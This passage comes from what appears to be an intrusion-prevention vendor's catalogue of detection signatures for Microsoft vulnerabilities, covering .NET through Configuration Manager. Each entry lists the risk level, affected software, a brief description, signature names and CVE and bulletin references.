Situation: File-Exe_Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow
References:
CVE-2013-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0003
BID-57114
http://www.securityfocus.com/bid/57114
OSVDB-88964
http://www.osvdb.org/88964
MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004
Back to top

Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework; Silverlight
Type: Malfunction
Description: There exists a code execution vulnerability in the Microsoft .NET and Silverlight frameworks. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CSU-Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
File-Exe_Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
References:
CVE-2011-1253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1253
OSVDB-76214
http://www.osvdb.org/76214
MS11-078
http://technet.microsoft.com/security/bulletin/MS11-078
Back to top

Microsoft-.NET-Framework-Winforms-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft .NET Framework Windows Form. The vulnerability is due to a race condition when handling the size of an array of objects prior to copying them into a global memory buffer. An attacker can remotely exploit this vulnerability by enticing a user to open a web page containing a specially crafted XBAP (XAML browser application). In addition, this vulnerability can also be exploited locally by a logged-in user to escape Windows Code Access Security (CAS) Restrictions. Successful remote exploitation would allow arbitrary code execution in the context of the logged-in user.
Situation: File-Exe_Microsoft-.NET-Framework-Winforms-Buffer-Overflow
References:
CVE-2013-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0002
BID-57126
http://www.securityfocus.com/bid/57126
OSVDB-88963
http://www.osvdb.org/88963
MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004
Back to top

Microsoft-.NET-Framework-Winforms-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: An information disclosure vulnerability exists in Microsoft .NET Framework Windows Form. The vulnerability is due to the way WinForms handles pointers to unmanaged memory locations. A remote, unauthenticated attacker can exploit this vulnerability by either enticing a user to visit a maliciously crafted website containing a specially crafted XML browser application or by using Windows .NET Framework applications to bypass Code Access Security (CAS) restrictions. In both cases exploit will result in privilege escalation, leading to information disclosure.
Situation: File-Exe_Microsoft-.NET-Framework-Winforms-Information-Disclosure
References:
CVE-2013-0001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0001
BID-57124
http://www.securityfocus.com/bid/57124
OSVDB-88962
http://www.osvdb.org/88962
MS13-004
http://technet.microsoft.com/security/bulletin/MS13-004
Back to top

Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft .NET Framework
Type: Malfunction
Description: A code execution vulnerability exists in the Microsoft .NET Framework. The vulnerability is due to memory corruption when handling method calls that take structures with misaligned fields as parameters. Remote attackers could exploit this vulnerability by either enticing target users to visit a malicious web page containing an XBAP (XAML browser application), or by uploading an ASP.NET application to a vulnerable server. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the PresentationHost.exe .NET component.
Situation: File-Exe_Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption
References:
CVE-2010-3958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3958
MS11-028
http://technet.microsoft.com/security/bulletin/MS11-028
Back to top

Microsoft-.NET-Framework-Xml-Digital-Signature-Spoofing

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Input Validation
Description: A spoofing vulnerability has been reported in Microsoft .NET Framework. The vulnerability is due to Microsoft .NET Framework fails to properly validate the signature of a specially crafted XML file. An attacker can exploit this vulnerability to modify the content of an XML file without invalidating the signature associated with the file.
Situation: File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing
References:
CVE-2013-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1336
BID-59789
http://www.securityfocus.com/bid/59789
OSVDB-93301
http://www.osvdb.org/93301
MS13-040
http://technet.microsoft.com/security/bulletin/MS13-040
Back to top

Microsoft-.NET-Framework-Xml-Signature-Validation-Entity-Expansion-DOS

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Resource Starvation
Description: A denial-of-service vulnerability exists in Microsoft .NET Framework. The vulnerability is due to the way the .NET framework parses a crafted document type definition (DTD) for XML data when an XML digital signature is validated. A remote attacker could exploit this vulnerability by submitting an XML document with a crafted DTD. Successful exploitation could result in the application terminating or becoming unresponsive, resulting in a denial-of-service condition.
Situation: HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
References:
CVE-2013-3860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3860
BID-62820
http://www.securityfocus.com/bid/62820
OSVDB-98215
http://www.osvdb.org/98215
MS13-082
http://technet.microsoft.com/security/bulletin/MS13-082
Back to top

Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Input Validation
Description: There exists a remote code execution vulnerability in Microsoft .NET Framework. Successful exploitation requires user interaction with a specially crafted XPS file.
Situation: File-TextId_Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution
References:
CVE-2020-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605
Back to top

Microsoft-.NET-Privilege-Escalation-CVE-2015-6096

About this vulnerability: A vulnerability in Microsoft .NET
Risk: Moderate
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: A vulnerability in Microsoft .NET
Situation: File-Text_Microsoft-.NET-Privilege-Escalation-CVE-2015-6096
References:
CVE-2015-6096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6096
MS15-118
http://technet.microsoft.com/security/bulletin/MS15-118
Back to top

Microsoft-Access-CVE-2013-3157-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Access
Risk: Moderate
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office Access; Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Access. The vulnerability exists in the way that Microsoft Access parses content in Access files. By enticing an target user to open a crafted Access file, an attacker can exploit this vulnerability to execute arbitrary code with the privileges of the logged on user.
Situation: File-Binary_Microsoft-Access-CVE-2013-3157-Memory-Corruption
References:
CVE-2013-3157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3157
BID-62231
http://www.securityfocus.com/bid/62231
OSVDB-97112
http://www.osvdb.org/97112
MS13-074
http://technet.microsoft.com/security/bulletin/MS13-074
Back to top

Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Access
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office Access; Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Access Wizard ActiveX Control.
Situation: HTTP_SS-Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-OLE_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
References:
CVE-2010-1881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1881
BID-41442
http://www.securityfocus.com/bid/41442
MS10-044
http://technet.microsoft.com/security/bulletin/MS10-044
Back to top

Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: An elevation of privilege vulnerability has been reported in Microsoft Active Directory Domain Services. The vulnerability allows potential attackers to impersonate a domain controller using computer account sAMAccountName spoofing. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to target server. Successful exploitation could allow the attacker to elevate their privileges in Active Directory.
Situation: LDAP_CS-Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege
References:
CVE-2021-42278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278
ms21-nov
http://technet.microsoft.com/security/bulletin/ms21-nov
Back to top

Microsoft-Active-Directory-Federation-Services-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There is a code execution vulnerability in Active Directory Federation Services (ADFS). The flaw is due to insufficient validation of HTTP request headers sent by authenticated clients. A remote authenticated attacker can exploit this vulnerability by sending maliciously crafted HTTP requests to Web servers that support ADFS. Successful exploitation would allow an attacker to perform actions on the IIS server within the security context of the Worker Process Identity (WPI), which by default is configured with Network Service account privileges.
Situation: HTTPS_CS-Microsoft-Active-Directory-Federation-Services-Code-Execution
References:
CVE-2009-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2509
BID-37214
http://www.securityfocus.com/bid/37214
MS09-070
http://technet.microsoft.com/security/bulletin/MS09-070
Back to top

Microsoft-Active-Directory-Federation-Services-Information-Disclosure

About this vulnerability: A vulnerability Microsoft Active Directory Federation Services
Risk: High
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008
Software: <os>
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft Active Directory Federation Services (ADFS).
Situation: File-TextId_MS-Active-Directory-Federation-Services-Information-Disclosure
References:
CVE-2013-3185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3185
MS13-066
http://technet.microsoft.com/security/bulletin/MS13-066
Back to top

Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757

About this vulnerability: A vulnerability in Microsoft Active Directory Federation Services
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008; Windows 2008 R2; Windows 2012
Software: <os>
Type: Cross-site Scripting
Description: There is a cross-site scripting (XSS) vulnerability in Microsoft Active Directory Federation Services that could allow elevation of privilege.
Situation: HTTP_CRL-Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757
References:
CVE-2015-1757
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1757
MS15-062
http://technet.microsoft.com/security/bulletin/MS15-062
Back to top

Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a denial of service vulnerability in the Microsoft Active Directory. The vulnerability is caused by improper handling of specifically crafted LDAP requests. A remote attacker can exploit this vulnerability to create a denial of service condition on the target system.
Situation: LDAP_CS-Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service
References:
CVE-2008-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0088
BID-27638
http://www.securityfocus.com/bid/27638
MS08-003
http://technet.microsoft.com/security/bulletin/MS08-003
Back to top

Microsoft-Active-Template-Library-Remote-Code-Execution-MS09-060

About this vulnerability: A remote code execution vulnerability in Windows Active Template Library
Risk: High
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft Active Template Library.
Situation: HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
References:
CVE-2009-0901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0901
BID-35832
http://www.securityfocus.com/bid/35832
MS09-060
http://technet.microsoft.com/security/bulletin/MS09-060
Back to top

Microsoft-ActiveX-Code-Execution-CVE-2012-0158

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-OLE_Microsoft-ActiveX-Code-Execution-CVE-2012-0158
File-RTF_Microsoft-ActiveX-Code-Execution-CVE-2012-0158
References:
CVE-2012-0158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158
BID-52911
http://www.securityfocus.com/bid/52911
MS12-027
http://technet.microsoft.com/security/bulletin/MS12-027
Back to top

Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Data Access Components
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Data Access Components
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft ActiveX Data Objects.
Situation: File-Text_Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption
References:
CVE-2012-1891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1891
OSVDB-83657
http://www.osvdb.org/83657
MS12-045
http://technet.microsoft.com/security/bulletin/MS12-045
Back to top

Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509

About this vulnerability: A remote code execution vulnerability in Active Directory Federation Services
Risk: High
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in Active Directory Federation Services.
Situation: HTTP_CSH-Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509
References:
CVE-2009-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2509
MS09-070
http://technet.microsoft.com/security/bulletin/MS09-070
Back to top

Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper handling of VToHOrigin records in multiple master Type 1 fonts causes a buffer overflow in Windows. A successful exploit may allow an attacker to execute code with high privileges on the target system.
Situation: File-TextId_Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow
References:
CVE-2020-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020
Back to top

Microsoft-Anti-XSS-Library-Bypass-Vulnerability

About this vulnerability: A vulnerability in Microsoft Anti-XSS Library
Risk: Moderate
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Anti-XSS Libarary
Type: Cross-site Scripting
Description: There is a vulnerability in the Microsoft Anti-Cross Site Scripting Library.
Situation: HTTP_CRL-Microsoft-Anti-XSS-Library-Bypass-Vulnerability
References:
CVE-2012-0007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0007
BID-51291
http://www.securityfocus.com/bid/51291
MS12-007
http://technet.microsoft.com/security/bulletin/MS12-007
Back to top

Microsoft-ASP.NET-Error-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft .NET Framework; IIS 7.0
Type: Malfunction
Description: A denial of service vulnerability exists within Microsoft ASP.NET.
Situation: HTTP_CSU-Microsoft-ASP.NET-Error-Handling-Denial-Of-Service
References:
CVE-2009-1536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1536
BID-35985
http://www.securityfocus.com/bid/35985
OSVDB-56905
http://www.osvdb.org/56905
MS09-036
http://technet.microsoft.com/security/bulletin/MS09-036
Back to top

Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1745-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: An elevation of privilege vulnerability exists in Microsoft's ASP.NET. The vulnerability is due to the way in which the security cookie is generated. A remote, unauthenticated attacker can exploit this vulnerability by registering a crafted account on an ASP.NET web application. Successful exploitation of this vulnerability would allow an attacker to impersonate a high privileged user of the affected ASP.NET web application, the attacker could then take any action in the context of the targeted user, possibly including executing arbitrary commands on the site.
Situation: HTTP_CRL-Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege
References:
CVE-2011-3416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3416
BID-51201
http://www.securityfocus.com/bid/51201
OSVDB-78055
http://www.osvdb.org/78055
MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100
Back to top

Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There is an insecure redirect vulnerability in the Microsoft ASP.NET framework. The vulnerability is due to improper validation of the ReturnUrl in the Forms Authentication module. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to visit a URL. After authenticating to a vulnerable server, a target user would be redirected to an attacker-controlled URI. Successful exploitation could lead to spoofing and information disclosure.
Situation: HTTP_CSU-Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect
References:
CVE-2011-3415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3415
BID-51202
http://www.securityfocus.com/bid/51202
OSVDB-78054
http://www.osvdb.org/78054
MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100
Back to top

Microsoft-ASP.NET-Hash-Collision-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft ASP.NET
Risk: High
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft ASP.NET
Type: Malfunction
Description: There is a vulnerability in Microsoft ASP.NET.
Situation: HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request
References:
CVE-2011-3414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3414
MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100
Back to top

Microsoft-ASP.NET-Information-Disclosure-CVE-2010-3332

About this vulnerability: An information disclosure vulnerability in Microsoft ASP.NET
Risk: High
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft ASP.NET.
References:
CVE-2010-3332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3332
BID-43316
http://www.securityfocus.com/bid/43316
MS10-070
http://technet.microsoft.com/security/bulletin/MS10-070
Back to top

Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability

About this vulnerability: Vulnerability in Microsoft .NET Framework
Risk: Low
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: There is a a vulnerability in Microsoft .NET Framework was detected. ASP.NET component of .NET Framework may allow access to configuration files and other sensitive information when the URI is terminated with an extra null character.
Situation: HTTP_CSU-Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability
References:
CVE-2007-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0042
MS07-040
http://technet.microsoft.com/security/bulletin/MS07-040
Back to top

Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure

About this vulnerability: A Microsoft ASP.NET PKCS Padding Information Disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft ASP.NET
Type: Malfunction
Description: A vulnerability in Microsoft ASP.NET which allows remote attackers to view and tamper with data on the target server due to the server providing web clients details in error messages when decrypting certain ciphertext.
Situation: HTTP_CSU-Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure
References:
CVE-2010-3332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3332
Back to top

Microsoft-ASP.NET-ViewState-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Microsoft ASP.NET
Risk: Moderate
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft ASP.NET
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft ASP.NET. An attacker can send an HTTP request with crafted VIEWSTATE data to consume a large amount of computing resources. A continuous attack may cause a denial of service condition.
Situation: HTTP_CRL-Microsoft-ASP.NET-ViewState-Denial-Of-Service
References:
CVE-2005-1665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1665
OSVDB-16195
http://www.osvdb.org/16195
Back to top

Microsoft-ATL-COM-Initialization

About this vulnerability: A vulnerability in Microsoft Active Template Library
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Active Template Library.
Situation: HTTP_SS-Microsoft-ATL-COM-Initialization
File-Binary_Microsoft-ATL-COM-Initialization
References:
CVE-2009-2493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2493
MS09-035
http://technet.microsoft.com/security/bulletin/MS09-035
Back to top

Microsoft-ATL-Uninitialized-Object

About this vulnerability: A vulnerability in Microsoft Active Template Library
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1729-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Active Template Library.
Situation: HTTP_SS-Microsoft-ATL-Uninitialized-Object
References:
CVE-2009-0901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0901
BID-35832
http://www.securityfocus.com/bid/35832
MS09-035
http://technet.microsoft.com/security/bulletin/MS09-035
Back to top

Microsoft-Authentication-Failure

About this vulnerability: A failed Microsoft login attempt detected
Risk: High
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: Any Software
Type: Brute Force
Description: This detects failed login attempts against Microsoft accounts.
Situation: File-Text_Microsoft-Authentication-Failure
Back to top

Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass

About this vulnerability: A vulnerability in Microsoft Azure Open Management Infrastructure
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Windows
Software: Microsoft Azure Open Management Infrastructure
Type: Malfunction
Description: Improper validation of the Authorization header in HTTP requests causes an authentication bypass vulnerability in Microsoft Azure Open Management Infrastructure. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-TextId_Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass
References:
CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647
Back to top

Microsoft-Browser-Memory-Corruption-CVE-2016-0105

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Browser-Memory-Corruption-CVE-2016-0105
References:
CVE-2016-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0105
MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023
Back to top

Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge and Internet Explorer
Risk: High
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion
References:
CVE-2016-3382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3382
MS16-118
http://technet.microsoft.com/security/bulletin/MS16-118
Back to top

Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability

About this vulnerability: Vulnerable ActiveX control allow access to the local system
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft BizTalk Server; Microsoft CAPICOM
Type: Malfunction
Description: There is a vulnerability in the Microsoft Cryptographic API Component Object Model (CAPICOM) Certificates ActiveX control included in Microsoft BizTalk Server. The vulnerability allows arbitrary code execution in the context of the current user.
Situation: HTTP_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
File-Text_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
References:
CVE-2007-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0940
BID-23782
http://www.securityfocus.com/bid/23782
OSVDB-34397
http://www.osvdb.org/34397
MS07-028
http://technet.microsoft.com/security/bulletin/MS07-028
Back to top

Microsoft-CAPICOM-Utilities-ActiveX-Control-Integer-Overflow-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft CAPICOM
Risk: High
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft CAPICOM
Type: Malfunction
Description: There is an integer overflow vulnerability in the 'GetRandom' function of Microsoft's CapiCom.Utilities ActiveX Control.
Situation: File-Text_CAPICOM-Utilities-ActiveX-Control-Vulnerable-Function-Call
Back to top

Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977

About this vulnerability: A vulnerability in Microsoft Chart Control
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Chart Control
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_CSU-Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977
References:
CVE-2011-1977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1977
MS11-066
http://technet.microsoft.com/security/bulletin/MS11-066
Back to top

Microsoft-Color-Management-Module-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of ICC profiles in Microsoft Color Management Module
Risk: High
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The Microsoft Color Management Module suffers from a buffer overflow vulnerability, which allows arbitrary code execution when processing malicious ICC profiles. The vulnerability can be exploited by embedding ICC profiles into images and tricking victims into viewing the image with software that uses the Color Management Module. ICC profiles can be embedded in various image formats, including JPEG, TIFF and PNG, although ICC profiles are not necessarily exploitable in all image formats.
Situation: HTTP_Suspicious-ICC-Profile-In-JPEG-File
E-Mail_BS-Suspicious-ICC-Profile-In-JPEG-File
File-JPEG_Microsoft-Windows-Suspicious-ICC-Profile-In-JPEG-File
References:
CVE-2005-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1219
BID-14214
http://www.securityfocus.com/bid/14214
MS05-036
http://technet.microsoft.com/security/bulletin/MS05-036
Back to top

Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1413-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Color Management System.
Situation: HTTP_SS-Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow
References:
CVE-2008-2245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2245
BID-30594
http://www.securityfocus.com/bid/30594
MS08-046
http://technet.microsoft.com/security/bulletin/MS08-046
Back to top

Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468

About this vulnerability: A vulnerability in Microsoft Configuration Manager
Risk: Critical
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Windows
Software: Microsoft Configuration Manager
Type: SQL Injection
Description: A SQL injection vulnerability exists in Microsoft Configuration Manager. An unauthenticated attacker can use this vulnerability to execute arbitrary code.
Situation: HTTP_CS-Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468
References:
CVE-2024-43468
